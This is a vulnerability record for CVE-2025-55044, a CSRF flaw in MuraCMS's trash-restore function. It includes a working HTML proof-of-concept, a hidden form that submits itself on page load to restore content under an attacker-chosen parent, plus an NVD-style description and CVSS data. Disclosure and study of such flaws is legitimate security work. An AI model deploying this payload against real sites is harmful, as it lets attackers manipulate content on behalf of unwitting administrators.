CVE-2025-55044

<!-- CVE-2025-55044 CSRF PoC for MuraCMS Trash Restore --> <!-- Visit this page as an authenticated MuraCMS administrator --> <!DOCTYPE html> <html> <head> <title>CSRF Exploit - CVE-2025-55044</title> </head> <body> <h1>CSRF Exploit for MuraCMS Trash Restore</h1> <p>This exploit will restore deleted content to an unauthorized location.</p> <form id="csrfForm" action="http://target-site.com/index.cfm/cTrash/restore/" method="POST" target="_blank"> <!-- Set the content ID to restore --> <input type="hidden" name="contentID" value="VICTIM_CONTENT_ID"> <!-- Set the target parent ID for restoration --> <input type="hidden" name="parentID" value="ATTACKER_CONTROLLED_LOCATION_ID"> <!-- MuraCMS restore action --> <input type="hidden" name="method" value="restore"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>Form submitted automatically. Check if content was restored.</p> </body> </html>

{"cve": {"id": "CVE-2025-55044", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:23.550", "lastModified": "2026-03-20T18:11:46.643", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Trash Restore CSRF vulnerability in MuraCMS through 10.1.10 allows attackers to restore deleted content from the trash to unauthorized locations through CSRF. The vulnerable cTrash.restore function lacks CSRF token validation, enabling malicious websites to forge requests that restore content to arbitrary parent locations when an authenticated administrator visits a crafted webpage. Successful exploitation of the Trash Restore CSRF vulnerability results in unauthorized restoration of deleted content to potentially inappropriate or malicious locations within the MuraCMS website structure. When an authenticated administrator visits a malicious webpage containing the CSRF exploit, their browser automatically submits a hidden form that restores specified content from the trash to a location determined by the attacker through the parentid parameter. This can lead to restoration of previously deleted malicious content, placement of sensitive documents in public areas, manipulation of website navigation structure, or restoration of outdated content that was intentionally removed for security or compliance reasons."}, {"lang": "es", "value": "La vulnerabilidad CSRF de restauración de papelera en MuraCMS hasta la versión 10.1.10 permite a los atacantes restaurar contenido eliminado de la papelera a ubicaciones no autorizadas a través de CSRF. La función vulnerable cTrash.restore carece de validación de token CSRF, lo que permite a sitios web maliciosos falsificar solicitudes que restauran contenido a ubicaciones padre arbitrarias cuando un administrador autenticado visita una página web manipulada. La explotación exitosa de la vulnerabilidad CSRF de restauración de papelera resulta en la restauración no autorizada de contenido eliminado a ubicaciones potencialmente inapropiadas o maliciosas dentro de la estructura del sitio web de MuraCMS. Cuando un administrador autenticado visita una página web maliciosa que contiene el exploit CSRF, su navegador envía automáticamente un formulario oculto que restaura contenido especificado de la papelera a una ubicación determinada por el atacante a través del parámetro parentid. Esto puede llevar a la restauración de contenido malicioso previamente eliminado, la colocación de documentos sensibles en áreas públicas, la manipulación de la estructura de navegación del sitio web o la restauración de contenido obsoleto que fue eliminado intencionalmente por razones de seguridad o cumplimiento."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB4646EE-1255-4B42-890A-E0B57EBFE2CE"}]}]}], "references": [{"url": "https://docs.murasoftware.com/v10/release-notes/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.murasoftware.com", "source": "[email protected]", "tags": ["Product"]}]}}